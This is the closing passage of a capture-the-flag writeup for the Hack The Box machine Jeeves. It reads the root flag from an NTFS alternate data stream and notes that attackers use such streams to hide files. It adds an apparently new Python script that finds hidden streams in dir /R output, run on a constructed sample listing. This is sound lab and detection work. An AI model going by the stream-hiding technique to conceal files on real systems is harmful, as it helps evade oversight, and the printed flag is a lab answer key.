C:\Users\Administrator\Desktop> more <hm.txt:root.txt
afbc5bd4b615a60648cec41c6ac92530

C:\Users\Administrator\Desktop>

19. How this works

Suspecting something was hidden, adding the /R switch to dir revealed hm.txt:root.txt:$DATA.

Entries ending in :$DATA are what Microsoft calls file streams, also known as Alternate Data Streams (ADS): an NTFS feature that lets a file carry extra named data streams besides its default unnamed one. They are not shown by Windows Explorer or by a plain dir listing, and on older Windows versions an executable stored in a stream could even be launched from the command line, so attackers use them to stash files (rootkit components, for instance) on machines they have compromised.

type cannot open a stream by name, but redirecting the stream into more (more < hm.txt:root.txt) works and returns the root flag.
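The dir /R check scales to a whole disk: capture dir /R /S from a suspect host and filter out the expected streams, which is what the example below does. It is added to this writeup and is not the author's code; the listing it runs on is constructed, repeating the Desktop listing from this box plus two made-up entries (a Zone.Identifier stream, which every file downloaded through a browser carries, and a second hidden stream) so the filter has something to ignore and something to flag.

```python
"""Find alternate data streams in `dir /R` output and read one back.

Example code added to this writeup, not the author's. SAMPLE_LISTING is a
constructed capture: the real Desktop listing from this box plus invented
entries under kohsuke\\Downloads.
"""
import re
from typing import List, Tuple

DIR_HEADER = re.compile(r"^\s*Directory of (.+?)\s*$")
# dir /R prints each stream on its own line: "<size> <file>:<stream>:$DATA"
STREAM_LINE = re.compile(r"^\s*([\d,]+)\s+(.+?):([^:\\/]+):\$DATA\s*$")
BENIGN_STREAMS = {"Zone.Identifier"}   # Mark-of-the-Web written by browsers


def find_alternate_streams(listing: str, include_benign: bool = False
                           ) -> List[Tuple[str, str, str, int]]:
    """Return (directory, file, stream, size) for every named stream found."""
    found, current_dir = [], ""
    for line in listing.splitlines():
        m = DIR_HEADER.match(line)
        if m:
            current_dir = m.group(1)
            continue
        m = STREAM_LINE.match(line)
        if not m:
            continue
        size = int(m.group(1).replace(",", ""))
        fname, stream = m.group(2), m.group(3)
        if stream in BENIGN_STREAMS and not include_benign:
            continue
        found.append((current_dir, fname, stream, size))
    return found


def read_stream(path: str, stream: str) -> bytes:
    """Read a named stream directly. NTFS/Windows only: the 'file:stream' form
    is resolved by the filesystem, which is also why 'more < hm.txt:root.txt'
    works while 'type' does not."""
    with open(f"{path}:{stream}", "rb") as fh:
        return fh.read()


SAMPLE_LISTING = """\
 Directory of C:\\Users\\Administrator\\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes

 Directory of C:\\Users\\kohsuke\\Downloads

04/27/2024  06:30 AM            12,288 winPEASx64.exe
                                    26 winPEASx64.exe:Zone.Identifier:$DATA
04/27/2024  06:31 AM                 0 notes.txt
                             1,048,576 notes.txt:payload.bin:$DATA
               2 File(s)         12,288 bytes
"""

if __name__ == "__main__":
    for d, f, s, n in find_alternate_streams(SAMPLE_LISTING):
        print(f"{n:>10}  {d}\\{f}:{s}")
```

A zero-byte file with a megabyte-sized stream, as in the constructed notes.txt entry, is the pattern to look for. On a live host the same enumeration is one PowerShell call, Get-Item -Path * -Stream * , and Get-Content -Stream reads a named stream without the redirection trick.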

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/114


Source: https://sh1yan.top/2024/04/26/Jeeves-htb-writeup/
Author: shiyan
Published: 26 April 2024